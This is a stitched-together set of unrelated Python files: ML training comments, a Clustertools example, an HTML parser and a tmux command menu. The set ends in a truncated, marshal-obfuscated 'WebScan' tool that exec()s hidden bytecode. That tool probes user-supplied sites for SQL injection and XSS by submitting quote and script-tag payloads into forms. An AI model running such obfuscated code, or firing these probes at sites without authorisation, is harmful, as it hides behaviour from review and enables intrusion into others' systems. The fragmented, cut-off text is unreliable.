# idx = np.where(np.logical_and(train_effort >= patrol_thresholds[i], train_effort < patrol_thresholds[i+1]))[0]
# # points within threshold interval AND all positive points
# if i == 0:
# idx = np.where(np.logical_or(train_effort < patrol_thresholds[i+1], train_y == POSITIVE_LABEL))[0]
# elif i == num_classifiers - 1:
# idx = np.where(np.logical_or(train_effort >= patrol_thresholds[i], train_y == POSITIVE_LABEL))[0]
# else:
# idx = np.where(np.logical_or(np.logical_and(train_effort >= patrol_thresholds[i], train_effort < patrol_thresholds[i+1]), train_y == POSITIVE_LABEL))[0]
# ------------------------------------------------------------------
# this is the original iWare-E approach
# all points above threshold
# if PARK == 'SWS':
# # don't keep positive labels for SWS because of the strong label imbalance
# idx = np.where(train_effort >= patrol_thresholds[i])[0]
# else:
# # AND POINTS WHERE LABEL IS POSITIVE
# idx = np.where(np.logical_or(train_effort >= patrol_thresholds[i], train_y == POSITIVE_LABEL))[0]
###########################################################
# calibration curves
###########################################################
# from calibration_curves import *
# run_all_calibration_curves(train_x, train_y, test_x, test_y)
# sys.exit(0)
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python
"""
Go through `001_basic_usage.py` before running this example. We will re-use
the same computation: x*y and z+w for x in [1, 2, 3], y = 2, z = 4,
w in [5, 6] in an experiment called BasicUsage.
Suppose you have done your experiment (say by running `001_basic_usage.py`) and
you suddenly want to measure the influence of a new parameter value, say x=4.
Of course, you cannot just add it to the parameter set and run the computation
again: Clustertools would mix and match the parameter ordering and you would
end up with a mess.
But don't give up! There is a simple way. You just have to edit your .py file
and explicitly tell Clustertools that you are adding new parameters. After
that you can just relaunch the experiment.
Changes to `001_basic_usage.py` are minimal. You have to:
1. Add a separator to the `ParameterSet` instance, thanks to the
:meth:`add_separator` method.
2. Add the new parameter values after the separator.
Adding the separator tells Clustertools that it should run the combinations of
parameters defined before the separator before running the combinations that
involve the new value(s). You can of course use several separators.
Note that you can use the separators to influence the ordering of the computations.
But there is a dedicated way to do that (see `007_priority.py`).
Run `python 001_basic_usage.py front-end`. Since the experiment `BasicUsage` has
already run, you cannot adapt it directly. Now imagine that you modified
`001_basic_usage.py` as in this file and ran it
(`python 004_adding_parameter_values.py front-end`). You can then run
`002_results.py` to see how the datacube has evolved.
"""
from clustertools import Computation, CTParser, ParameterSet, \
Experiment, set_stdout_logging
class MyComputation(Computation):
"""
Inherit from `Computation` and redefine the `run` method as you wish
"""
def run(self, result, x, z, w, y=2, **parameters):
import time
from random import randint
result["multiply"] = x * y
result["sum"] = z + w
time.sleep(randint(1, 10))
if __name__ == "__main__":
set_stdout_logging()
parser = CTParser()
environment, _ = parser.parse()
param_set = ParameterSet()
param_set.add_parameters(x=[1, 2, 3], z=4, w=[5, 6])
# Add the separator and the new parameter values
# -- Separator
param_set.add_separator()
# -- new parameter values
param_set.add_parameters(x=4)
# you could also have added several values at once with:
# param_set.add_parameters(x=[4, 5]) for instance
experiment = Experiment("BasicUsage", param_set, MyComputation)
environment.run(experiment)
|
from html.parser import HTMLParser
class CardParser(HTMLParser):
inside_p = False
text = ''
def clear(self):
self.text = ''
self.inside_p = False
def handle_starttag(self, tag, attrs):
# print("Start tag:", tag)
if tag == "p":
self.inside_p = True
def handle_endtag(self, tag):
# print("End tag :", tag)
if (tag == "p") and self.inside_p:
self.inside_p = False
def handle_data(self, data):
# print("Data :", data)
if self.inside_p:
# print("***********")
# print(data)
# print("***********")
self.text += ' ' + data
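# A minimal usage sketch (hypothetical HTML string), showing that only text inside
# <p> tags is collected:
# parser = CardParser()
# parser.feed('<div><p>Hello</p><span>skipped</span><p>world</p></div>')
# print(parser.text) # -> ' Hello world'
# parser.clear() # reset state before feeding the next document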
|
import os
import sys
import time
from argparse import SUPPRESS, ArgumentParser
from dodo_commands import CommandError, Dodo
from dodo_commands.dependencies.get import plumbum
from dodo_commands.framework.choice_picker import ChoicePicker
from dodo_commands.framework.util import exe_exists
tmux = plumbum.cmd.tmux
def _normalize(category):
return category.replace(" ", "-")
def _args():
command_map = Dodo.get("/MENU/commands", {})
default_session_id = Dodo.get("/MENU/session_id", os.path.expandvars("$USER"))
parser = ArgumentParser()
parser.add_argument(
"category",
choices=["all"] + list([_normalize(x) for x in command_map.keys()]),
nargs="?",
)
parser.add_argument("--contnue", action="store_true", help=SUPPRESS)
parser.add_argument("--tmux", action="store_true")
parser.add_argument("--list", action="store_true")
parser.add_argument("--run", type=int, nargs="?", const=-1)
parser.add_argument(
"--id",
dest="session_id",
default=default_session_id,
help="The tmux session id",
)
args = Dodo.parse_args(parser)
args.category = args.category or "all"
args.run = -1 if args.run is None else args.run
args.command_map = command_map
return args
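# Hypothetical example of the /MENU configuration read above (shape only, not a real
# config from this project): "commands" maps a category name to a list of shell
# commands, and "session_id" names the tmux session, e.g. in the Dodo config file:
#
# MENU:
#   session_id: mysession
#   commands:
#     docker: ["docker ps", "docker images"]
#     git: ["git status", "git log --oneline -5"]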
def _create_tmux_window(session_id):
# Create tmux session
tmux("-2", "new-session", "-d", "-s", session_id)
# Create a tmux window
tmux("new-window", "-t", "%s:1" % session_id, "-n", "Logs")
def _get_categories(command_map, category):
return [x for x in command_map if category == "all" or _normalize(x) == category]
def _get_commands_and_labels(command_map, category):
categories = _get_categories(command_map, category)
label_size = 0
for category in categories:
label_size = max(label_size, len(category))
label_prefix = "%0" + str(label_size) + "s"
commands, labels = [], []
for category in categories:
for command in command_map[category]:
commands.append(command)
format_string = "%02s [" + label_prefix + "] - %s"
labels.append(format_string % (str(len(commands)), category, command))
return commands, labels
def _get_selected_commands(commands, labels, allow_free_text=False):
class Picker(ChoicePicker):
def print_choices(self, choices):
print()
for idx, label in enumerate(choices):
print(label)
print()
def question(self):
return "Select one or more commands (e.g. 1,3-4)%s or type 0 to exit: " % (
", or type a command," if allow_free_text else ""
)
def on_invalid_index(self, index):
if index == 0:
sys.exit(0)
picker = Picker(commands, allow_free_text=allow_free_text, labels=labels)
picker.pick()
return [picker.free_text] if picker.free_text else picker.get_choices()
if Dodo.is_main(__name__):
args = _args()
commands, labels = _get_commands_and_labels(args.command_map, args.category)
if not commands:
raise CommandError("No commands were found in the /MENU configuration key")
if args.list:
print()
for label in labels:
print(label)
elif args.tmux:
if not exe_exists("tmux"):
raise CommandError("Tmux is not installed on this sytem.")
has_session = False
try:
sessions = tmux("ls")
for session in sessions.split("\n"):
has_session = has_session or session.startswith("%s:" % args.session_id)
except: # noqa
pass
if not has_session:
_create_tmux_window(args.session_id)
tmux("send-keys", " ".join(sys.argv + ["--contnue"]), "C-m")
# Attach to tmux session
# HACK: why does this only work via Dodo.run?
Dodo.run(
["tmux", "-2", "attach-session", "-t", args.session_id],
)
elif not args.contnue:
Dodo.run(
["tmux", "-2", "attach-session", "-t", args.session_id],
)
else:
while True:
tmux("send-keys", "-R", "")
selected_commands = _get_selected_commands(
commands, labels, allow_free_text=True
)
for command in selected_commands:
print(command)
tmux("split-window", "-v")
time.sleep(0.5)
tmux("send-keys", command, "C-m")
tmux("select-layout", "tile")
# Set default window
tmux("select-pane", "-t", "0")
else:
selected_commands = (
_get_selected_commands(commands, labels)
if args.run == -1
else [commands[args.run - 1]]
)
for command in selected_commands:
Dodo.run(["bash", "-c", command])
|
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s\xda\x00\x00\x00d\x00d\x01l\x00Z\x00d\x00d\x01l\x01Z\x01d\x00d\x01l\x02Z\x02d\x00d\x02l\x03m\x04Z\x05\x01\x00d\x00d\x03l\x06m\x07Z\x07\x01\x00d\x00d\x04l\x08m\x08Z\x08\x01\x00d\x00d\x05l\tm\nZ\n\x01\x00d\x00d\x06l\x0bm\x0cZ\x0c\x01\x00d\x07Z\rd\x08Z\x0ed\td\n\x84\x00Z\x0fd\x0bd\x0c\x84\x00Z\x10e\x00\xa0\x11\xa1\x00Z\x12d\re\x12j\x13d\x0e<\x00d\x0fd\x10\x84\x00Z\x14d\x11d\x12\x84\x00Z\x15d\x13d\x14\x84\x00Z\x16d\x15d\x16\x84\x00Z\x17d\x17Z\x18d\x18d\x10\x84\x00Z\x14d\x19d\x12\x84\x00Z\x15d\x1ad\x1b\x84\x00Z\x19d\x1cd\x1d\x84\x00Z\x1ad\x1ed\x1f\x84\x00Z\x1be\x0f\x83\x00\x01\x00e\x1b\x83\x00\x01\x00d\x01S\x00) \xe9\x00\x00\x00\x00N)\x01\xda\rBeautifulSoup)\x01\xda\x07urljoin)\x01\xda\x06pprint)\x01\xda\x07colored)\x01\xda\x04Forea1\x05\x00\x00____ ______ ___ ________ ______ __ _____ ___ _____ ___ _______ _______ \n\x1b[1;36m __ __ ___ _______ _______ ________ ______ __ _____ ___ _____ ___ _______ _______ \n|" |/ \\| "| /" "|| _ "\\ /" )/" _ "\\ /""\\ (" \\|" \\ (" \\|" \\ /" "| /" \\ \n|\' / \\: |(: ______)(. |_) :) (: \\___/(: ( \\___) / \\ |.\\ \\ ||.\\ \\ |(: ______)|: | \n|: /\' | \\/ | |: \\/ \\___ \\ \\/ \\ /\' /\\ \\ |: \\. \\ ||: \\. \\ | \\/ | |_____/ ) \n \\// /\' | // ___)_ (| _ \\ __/ \\ // \\ _ // __\' \\ |. \\ \\. ||. \\ \\. | // ___)_ // / \n / / \\ |(: "||: |_) :) /" \\ :)(: _) \\ / / \\ \\| \\ \\ || \\ \\ |(: "||: __ \\ \n|___/ \\___| \\_______)(_______/ (_______/ \\_______)(___/ \\___)\\___|\\____\\) \\___|\\____\\) \\_______)|__| \\___) \n\x1b[1;36m\n-----------------------------\n\x1b[1;94mName: WebScan\nCoded by: AnonyminHack5\nVersion: 1.0\x1b[0m\n----------------------------\nWebScan is a web vulnerability Scanning tool, which scans sites for SQL injection and XSS vulnerabilities\nWhich is a great tool for web pentesters. Coded in python, CLI.\n------------------------------------------------------------------------------------\na\x1d\x03\x00\x00________ ______ ___ ________ ______ __ _____ ___ _____ ___ _______ _______ \n\x1b[1;37m /" ) / " \\ |" | /" )/" _ "\\ /""\\ (" \\|" \\ (" \\|" \\ /" "| /" \\ \n(: \\___/ // ____ \\ || | (: \\___/(: ( \\___) / \\ |.\\ \\ ||.\\ \\ |(: ______)|: | \n \\___ \\ / / ) )|: | \\___ \\ \\/ \\ /\' /\\ \\ |: \\. \\ ||: \\. \\ | \\/ | |_____/ ) \n __/ \\(: (____/ // \\ |___ __/ \\ // \\ _ // __\' \\ |. \\ \\. ||. \\ \\. 
| // ___)_ // / \n /" \\ :)\\ \\ ( \\_|: \\ /" \\ :)(: _) \\ / / \\ \\| \\ \\ || \\ \\ |(: "||: __ \\ \n(_______/ "____/\\__\\ \\_______)(_______/ \\_______)(___/ \\___)\\___|\\____\\) \\___|\\____\\) \\_______)|__| \\___)\n\x1b[0m\nc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s\x0e\x00\x00\x00t\x00\xa0\x01d\x01\xa1\x01\x01\x00d\x00S\x00)\x02Nz\x0ccls || clear)\x02\xda\x02os\xda\x06system\xa9\x00r\t\x00\x00\x00r\t\x00\x00\x00\xda\x00\xda\x0cclear_screen0\x00\x00\x00s\x02\x00\x00\x00\x00\x01r\x0b\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s\xf4\x00\x00\x00t\x00t\x01j\x02d\x01\x17\x00\x83\x01\x01\x00t\x00d\x02\x83\x01\x01\x00t\x00t\x01j\x03d\x03\x17\x00\x83\x01\x01\x00t\x00t\x01j\x03d\x04\x17\x00\x83\x01\x01\x00t\x00t\x01j\x03d\x05\x17\x00\x83\x01\x01\x00t\x00d\x02\x83\x01\x01\x00t\x04d\x06\x83\x01}\x00|\x00d\x07k\x02rzt\x00t\x05\x83\x01\x01\x00t\x06d\x08k\x02r\xf0t\x04d\t\x83\x01}\x01t\x07|\x01\x83\x01\x01\x00nv|\x00d\nk\x02r\xa8t\x00t\x08\x83\x01\x01\x00t\x06d\x08k\x02r\xf0t\x04d\x0b\x83\x01}\x01t\x00t\t|\x01\x83\x01\x83\x01\x01\x00nH|\x00d\x0ck\x02r\xcet\x00t\x01j\nd\r\x17\x00\x83\x01\x01\x00t\x0b\xa0\x0cd\x0e\xa1\x01\x01\x00t\r\x01\x00n"t\x00t\x01j\nd\x0f\x17\x00\x83\x01\x01\x00t\x0b\xa0\x0cd\x0e\xa1\x01\x01\x00t\x0e\xa0\x0fd\x10\xa1\x01\x01\x00d\x00S\x00)\x11Nu\x13\x00\x00\x00\t\xcc\xb2 SQlScanner Menur\n\x00\x00\x00z\x1f{1} Scan site For Sql injectionz\x1a{2} Scan site for XSS vulnz\x08{3} Exitzh\x1b[1;34m--\x1b[0m(kali@AnonyminHack5\x1b[0m)-[\x1b[1;34m~/home/SqlScan\x1b[0m]\n$ \x1b[1;94mChoose an Option\x1b[0m: \x1b[1;36m\xda\x011\xda\x08__main__z,Enter Site to test for SQLinjection: \x1b[1;34m\xda\x012z#Enter Site to test for XSS: \x1b[1;34m\xda\x013z [x] Exiting from WebScan ... 
[x]\xe9\x01\x00\x00\x00z\x1cWrong Option dude, try againz\x12python3 webscan.py)\x10\xda\x05printr\x06\x00\x00\x00Z\x04CYANZ\x06YELLOW\xda\x05input\xda\tsqlbanner\xda\x08__name__\xda\x12scan_sql_injection\xda\txssbanner\xda\x08scan_xss\xda\x03RED\xda\x04time\xda\x05sleep\xda\x04exitr\x07\x00\x00\x00r\x08\x00\x00\x00)\x02\xda\x01y\xda\x03urlr\t\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00\xda\x04menu4\x00\x00\x00s0\x00\x00\x00\x00\x01\x0e\x01\x08\x01\x0e\x01\x0e\x01\x0e\x01\x08\x01\x08\x02\x08\x01\x08\x01\x08\x01\x08\x01\n\x01\x08\x01\x08\x01\x08\x01\x08\x01\x0e\x01\x08\x01\x0e\x01\n\x01\x06\x02\x0e\x01\n\x01r\x1e\x00\x00\x00a\xbd\x01\x00\x00Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36, Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1, Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36, Mozilla/5.0 (Linux; Android 6.0.1; SM-G920V Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36z\nUser-Agentc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s\x1c\x00\x00\x00t\x00t\x01\xa0\x02|\x00\xa1\x01j\x03d\x01\x83\x02}\x01|\x01\xa0\x04d\x02\xa1\x01S\x00\xa9\x03z9Given a `url`, it returns all forms from the HTML contentz\x0bhtml.parser\xda\x04form)\x05\xda\x02bs\xda\x01s\xda\x03get\xda\x07content\xda\x08find_all\xa9\x02r\x1d\x00\x00\x00Z\x04soupr\t\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00\xda\rget_all_formsU\x00\x00\x00s\x04\x00\x00\x00\x00\x02\x12\x01r\'\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s\xa6\x00\x00\x00i\x00}\x01z\x14|\x00j\x00\xa0\x01d\x01\xa1\x01\xa0\x02\xa1\x00}\x02W\x00n\x10\x01\x00\x01\x00\x01\x00d\x02}\x02Y\x00n\x020\x00|\x00j\x00\xa0\x01d\x03d\x04\xa1\x02\xa0\x02\xa1\x00}\x03g\x00}\x04|\x00\xa0\x03d\x05\xa1\x01D\x00]>}\x05|\x05j\x00\xa0\x01d\x06d\x07\xa1\x02}\x06|\x05j\x00\xa0\x01d\x08\xa1\x01}\x07|\x05j\x00\xa0\x01d\td\n\xa1\x02}\x08|\x04\xa0\x04|\x06|\x07|\x08d\x0b\x9c\x03\xa1\x01\x01\x00qJ|\x02|\x01d\x01<\x00|\x03|\x01d\x03<\x00|\x04|\x01d\x0c<\x00|\x01S\x00)\r\xfaU\n This function extracts all possible useful information about an HTML `form`\n \xda\x06actionN\xda\x06methodr#\x00\x00\x00r\x12\x00\x00\x00\xda\x04type\xda\x04text\xda\x04name\xda\x05valuer\n\x00\x00\x00)\x03r+\x00\x00\x00r-\x00\x00\x00r.\x00\x00\x00\xda\x06inputs\xa9\x05\xda\x05attrsr#\x00\x00\x00\xda\x05lowerr%\x00\x00\x00\xda\x06append)\tr \x00\x00\x00\xda\x07detailsr)\x00\x00\x00r*\x00\x00\x00r/\x00\x00\x00\xda\tinput_tag\xda\ninput_type\xda\ninput_name\xda\x0binput_valuer\t\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00\xda\x10get_form_details[\x00\x00\x00s \x00\x00\x00\x00\x04\x04\x02\x02\x01\x14\x01\x06\x01\n\x02\x12\x02\x04\x01\x0e\x01\x0e\x01\x0c\x01\x0e\x01\x14\x02\x08\x01\x08\x01\x08\x01r9\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s.\x00\x00\x00h\x00d\x01\xa3\x01}\x01|\x01D\x00]\x1c}\x02|\x02|\x00j\x00\xa0\x01\xa1\x00\xa0\x02\xa1\x00v\x00r\x0c\x01\x00d\x02S\x00q\x0cd\x03S\x00)\x04zmA simple boolean function that determines whether a page \n is SQL Injection vulnerable from its `response`>\x04\x00\x00\x00z%you have an error in your sql syntax;z\x0ewarning: mysqlz2unclosed quotation mark after the character stringz%quoted string not properly 
terminatedTF)\x03r$\x00\x00\x00\xda\x06decoder2\x00\x00\x00)\x03Z\x08response\xda\x06errors\xda\x05errorr\t\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00\xda\ris_vulnerablet\x00\x00\x00s\n\x00\x00\x00\x00\x03\x08\t\x08\x02\x12\x01\x08\x02r=\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\t\x00\x00\x00C\x00\x00\x00sr\x01\x00\x00d\x01D\x00]B}\x01|\x00\x9b\x00|\x01\x9b\x00\x9d\x02}\x02t\x00d\x02|\x02\x83\x02\x01\x00t\x01\xa0\x02|\x02\xa1\x01}\x03t\x03|\x03\x83\x01r\x04t\x00t\x04j\x05d\x03\x17\x00|\x02\x83\x02\x01\x00\x01\x00d\x00S\x00q\x04t\x06|\x00\x83\x01}\x04t\x00d\x04t\x07|\x04\x83\x01\x9b\x00d\x05|\x00\x9b\x00d\x06\x9d\x05\x83\x01\x01\x00|\x04D\x00\x90\x00]\xfc}\x05t\x08|\x05\x83\x01}\x06d\x01D\x00]\xea}\x01i\x00}\x07|\x06d\x07\x19\x00D\x00]^}\x08|\x08d\x08\x19\x00d\tk\x02s\xa8|\x08d\n\x19\x00r\xd0z\x18|\x08d\n\x19\x00|\x01\x17\x00|\x07|\x08d\x0b\x19\x00<\x00W\x00q\xee\x01\x00\x01\x00\x01\x00Y\x00q\xee0\x00q\x90|\x08d\x08\x19\x00d\x0ck\x03r\x90d\r|\x01\x9b\x00\x9d\x02|\x07|\x08d\x0b\x19\x00<\x00q\x90t\t|\x00|\x06d\x0e\x19\x00\x83\x02}\x00|\x06d\x0f\x19\x00d\x10k\x02\x90\x01r\x1ct\x01j\n|\x00|\x07d\x11\x8d\x02}\x03n\x1c|\x06d\x0f\x19\x00d\x12k\x02\x90\x01r8t\x01j\x02|\x00|\x07d\x13\x8d\x02}\x03t\x03|\x03\x83\x01r\x80t\x00t\x04j\x05d\x03\x17\x00|\x00\x83\x02\x01\x00t\x00t\x04j\x0bd\x14\x17\x00\x83\x01\x01\x00t\x0c|\x06\x83\x01\x01\x00\x01\x00qnq\x80qnd\x00S\x00)\x15Nz\x02"\'z\n[!] Tryingz/[+] SQL Injection vulnerability detected, link:\xfa\r[+] Detected \xfa\n forms on \xda\x01.r/\x00\x00\x00r+\x00\x00\x00Z\x06hiddenr.\x00\x00\x00r-\x00\x00\x00Z\x06submit\xda\x04testr)\x00\x00\x00r*\x00\x00\x00\xda\x04post\xa9\x01\xda\x04datar#\x00\x00\x00\xa9\x01\xda\x06paramsz\t[+] Form:)\rr\x11\x00\x00\x00r"\x00\x00\x00r#\x00\x00\x00r=\x00\x00\x00r\x06\x00\x00\x00\xda\x05GREENr\'\x00\x00\x00\xda\x03lenr9\x00\x00\x00r\x03\x00\x00\x00rB\x00\x00\x00\xda\x04BLUEr\x04\x00\x00\x00)\tr\x1d\x00\x00\x00\xda\x01cZ\x07new_url\xda\x03res\xda\x05formsr \x00\x00\x00\xda\x0cform_detailsrD\x00\x00\x00r5\x00\x00\x00r\t\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00r\x15\x00\x00\x00\x87\x00\x00\x00s>\x00\x00\x00\x00\x02\x08\x02\x0c\x01\n\x02\n\x01\x08\x03\x10\x01\x08\x02\x08\x01\x1a\x01\n\x01\x08\x01\x08\x02\x04\x01\x0c\x01\x14\x03\x02\x01\x18\x01\x06\x01\x08\x01\x0c\x02\x14\x02\x0e\x01\x0e\x01\x10\x01\x0e\x01\x0e\x02\x08\x01\x10\x01\x0e\x01\x08\x01r\x15\x00\x00\x00a\x9f\x03\x00\x00\n\n ___ ___ ________ ________ ________ ______ __ _____ ___ _____ ___ _______ _______ \n|" \\/" | /" )/" ) /" )/" _ "\\ /""\\ (" \\|" \\ (" \\|" \\ /" "| /" \\ \n \\ \\ / (: \\___/(: \\___/ (: \\___/(: ( \\___) / \\ |.\\ \\ ||.\\ \\ |(: ______)|: | \n \\ \\/ \\___ \\ \\___ \\ \\___ \\ \\/ \\ /\' /\\ \\ |: \\. \\ ||: \\. \\ | \\/ | |_____/ ) \n /\\. \\ __/ \\ __/ \\ __/ \\ // \\ _ // __\' \\ |. \\ \\. ||. \\ \\. 
| // ___)_ // / \n / \\ \\ /" \\ :) /" \\ :) /" \\ :)(: _) \\ / / \\ \\| \\ \\ || \\ \\ |(: "||: __ \\ \n|___/\\___|(_______/ (_______/ (_______/ \\_______)(___/ \\___)\\___|\\____\\) \\___|\\____\\) \\_______)|__| \\___) \n \nc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s\x1c\x00\x00\x00t\x00t\x01\xa0\x02|\x00\xa1\x01j\x03d\x01\x83\x02}\x01|\x01\xa0\x04d\x02\xa1\x01S\x00r\x1f\x00\x00\x00)\x05r!\x00\x00\x00\xda\x08requestsr#\x00\x00\x00r$\x00\x00\x00r%\x00\x00\x00r&\x00\x00\x00r\t\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00r\'\x00\x00\x00\xc2\x00\x00\x00s\x04\x00\x00\x00\x00\x02\x12\x01c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x80\x00\x00\x00i\x00}\x01|\x00j\x00\xa0\x01d\x01\xa1\x01\xa0\x02\xa1\x00}\x02|\x00j\x00\xa0\x01d\x02d\x03\xa1\x02\xa0\x02\xa1\x00}\x03g\x00}\x04|\x00\xa0\x03d\x04\xa1\x01D\x00].}\x05|\x05j\x00\xa0\x01d\x05d\x06\xa1\x02}\x06|\x05j\x00\xa0\x01d\x07\xa1\x01}\x07|\x04\xa0\x04|\x06|\x07d\x08\x9c\x02\xa1\x01\x01\x00q4|\x02|\x01d\x01<\x00|\x03|\x01d\x02<\x00|\x04|\x01d\t<\x00|\x01S\x00)\nr(\x00\x00\x00r)\x00\x00\x00r*\x00\x00\x00r#\x00\x00\x00r\x12\x00\x00\x00r+\x00\x00\x00r,\x00\x00\x00r-\x00\x00\x00)\x02r+\x00\x00\x00r-\x00\x00\x00r/\x00\x00\x00r0\x00\x00\x00)\x08r \x00\x00\x00r4\x00\x00\x00r)\x00\x00\x00r*\x00\x00\x00r/\x00\x00\x00r5\x00\x00\x00r6\x00\x00\x00r7\x00\x00\x00r\t\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00r9\x00\x00\x00\xc7\x00\x00\x00s\x18\x00\x00\x00\x00\x04\x04\x02\x10\x02\x12\x02\x04\x01\x0e\x01\x0e\x01\x0c\x01\x12\x02\x08\x01\x08\x01\x08\x01c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s\x94\x00\x00\x00t\x00|\x01|\x00d\x01\x19\x00\x83\x02}\x03|\x00d\x02\x19\x00}\x04i\x00}\x05|\x04D\x00]H}\x06|\x06d\x03\x19\x00d\x04k\x02s:|\x06d\x03\x19\x00d\x05k\x02rB|\x02|\x06d\x06<\x00|\x06\xa0\x01d\x07\xa1\x01}\x07|\x06\xa0\x01d\x06\xa1\x01}\x08|\x07r\x1e|\x08r\x1e|\x08|\x05|\x07<\x00q\x1e|\x00d\x08\x19\x00d\tk\x02r\x82t\x02j\x03|\x03|\x05d\n\x8d\x02S\x00t\x02j\x01|\x03|\x05d\x0b\x8d\x02S\x00d\x0cS\x00)\ra<\x01\x00\x00\n Submits a form given in `form_details`\n Params:\n form_details (list): a dictionary that contain form information\n url (str): the original URL that contain that form\n value (str): this will be replaced to all text and search inputs\n Returns the HTTP Response after form submission\n r)\x00\x00\x00r/\x00\x00\x00r+\x00\x00\x00r,\x00\x00\x00\xda\x06searchr.\x00\x00\x00r-\x00\x00\x00r*\x00\x00\x00rB\x00\x00\x00rC\x00\x00\x00rE\x00\x00\x00N)\x04r\x03\x00\x00\x00r#\x00\x00\x00rN\x00\x00\x00rB\x00\x00\x00)\trM\x00\x00\x00r\x1d\x00\x00\x00r.\x00\x00\x00Z\ntarget_urlr/\x00\x00\x00rD\x00\x00\x00r\x12\x00\x00\x00r7\x00\x00\x00r8\x00\x00\x00r\t\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00\xda\x0bsubmit_form\xdc\x00\x00\x00s\x1a\x00\x00\x00\x00\n\x0e\x02\x08\x01\x04\x01\x08\x02\x18\x01\x08\x01\n\x01\n\x01\x08\x03\n\x02\x0c\x01\x0e\x03rP\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s|\x00\x00\x00t\x00|\x00\x83\x01}\x01t\x01d\x01t\x02|\x01\x83\x01\x9b\x00d\x02|\x00\x9b\x00d\x03\x9d\x05\x83\x01\x01\x00d\x04}\x02d\x05}\x03|\x01D\x00]H}\x04t\x03|\x04\x83\x01}\x05t\x04|\x05|\x00|\x02\x83\x03j\x05\xa0\x06\xa1\x00}\x06|\x02|\x06v\x00r.t\x01d\x06|\x00\x9b\x00\x9d\x02\x83\x01\x01\x00t\x01d\x07\x83\x01\x01\x00t\x07|\x05\x83\x01\x01\x00d\x08}\x03q.|\x03S\x00)\tzw\n Given a `url`, it prints all XSS vulnerable forms and \n returns True if any is vulnerable, False otherwise\n 
r>\x00\x00\x00r?\x00\x00\x00r@\x00\x00\x00z(<Script>alert(\'XSS detected!!\')</scripT>Fz\x14[+] XSS Detected on z\x11[*] Form details:T)\x08r\'\x00\x00\x00r\x11\x00\x00\x00rH\x00\x00\x00r9\x00\x00\x00rP\x00\x00\x00r$\x00\x00\x00r:\x00\x00\x00r\x04\x00\x00\x00)\x07r\x1d\x00\x00\x00rL\x00\x00\x00Z\tjs_scriptr=\x00\x00\x00r \x00\x00\x00rM\x00\x00\x00r$\x00\x00\x00r\t\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00r\x17\x00\x00\x00\xfc\x00\x00\x00s\x1a\x00\x00\x00\x00\x06\x08\x01\x1a\x01\x04\x02\x04\x02\x08\x01\x08\x01\x12\x01\x08\x01\x0e\x01\x08\x01\x08\x01\x06\x02r\x17\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\n\x00\x00\x00C\x00\x00\x00s\xe6\x00\x00\x00t\x00t\x01j\x02d\x01\x17\x00\x83\x01\x01\x00t\x03\xa0\x04d\x02\xa1\x01\x01\x00d\x03}\x00d\x04}\x01zTt\x05j\x06|\x00|\x01d\x05\x8d\x02}\x02t\x00t\x01j\x07d\x06\x17\x00\x83\x01\x01\x00t\x00t\x01j\x07d\x07\x17\x00\x83\x01\x01\x00t\x00d\x06\x83\x01\x01\x00t\x03\xa0\x04d\x08\xa1\x01\x01\x00t\x08\x83\x00\x01\x00t\x00t\t\x83\x01\x01\x00t\n\x83\x00\x01\x00W\x00nl\x04\x00t\x05j\x0bt\x05j\x0cf\x02y\xe0\x01\x00}\x03\x01\x00zLt\x00t\x01j\rd\x06\x17\x00\x83\x01\x01\x00t\x00t\x01j\rd\t\x17\x00\x83\x01\x01\x00t\x00t\x01j\rd\n\x17\x00\x83\x01\x01\x00t\x00d\x06\x83\x01\x01\x00t\x03\xa0\x04d\x08\xa1\x01\x01\x00t\x0e\x01\x00W\x00Y\x00d\x00}\x03~\x03n\nd\x00}\x03~\x030\x000\x00d\x00S\x00)\x0bNz;Checking if your connected to the internet >>>>> [Checking]\xe9\x02\x00\x00\x00z\x1ehttps://github.com/TermuxHackz\xe9\x05\x00\x00\x00)\x01\xda\x07timeoutz\x1a##########################z 